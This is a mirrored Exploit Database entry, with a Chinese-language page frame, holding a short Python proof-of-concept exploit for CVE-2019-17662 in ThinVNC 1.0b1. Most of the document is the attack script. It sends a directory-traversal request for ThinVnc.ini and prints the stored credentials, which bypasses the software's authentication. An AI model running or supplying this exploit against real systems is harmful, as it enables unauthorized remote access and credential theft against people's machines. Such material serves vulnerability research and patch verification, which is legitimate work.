ThinVNC 1.0b1 – Authentication Bypass

• Exploit Database
• 13 阅读

• 作者： Nikhith Tumamlapalli
  日期： 2019-10-17
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47519/

• # Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
  # Date: 2019-10-17
  # Exploit Author: Nikhith Tumamlapalli
  # Contributor WarMarX
  # Vendor Homepage: https://sourceforge.net/projects/thinvnc/
  # Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
  # Version: 1.0b1
  # Tested on: Windows All Platforms
  # CVE : CVE-2019-17662
  
  # Description:
  # Authentication Bypass via Arbitrary File Read
  
  #!/usr/bin/python3
  
  import sys
  import os
  import requests
  
  def exploit(host,port):
  url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
  r = requests.get(url)
  body = r.text
  print(body.splitlines()[2])
  print(body.splitlines()[3])
  
  
  
  def main():
  if(len(sys.argv)!=3):
  print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
  print("Example:\n{} 192.168.0.10 5888")
  else:
  port = sys.argv[2]
  host = sys.argv[1]
  exploit(host,port)
  
  if __name__ == '__main__':
  main()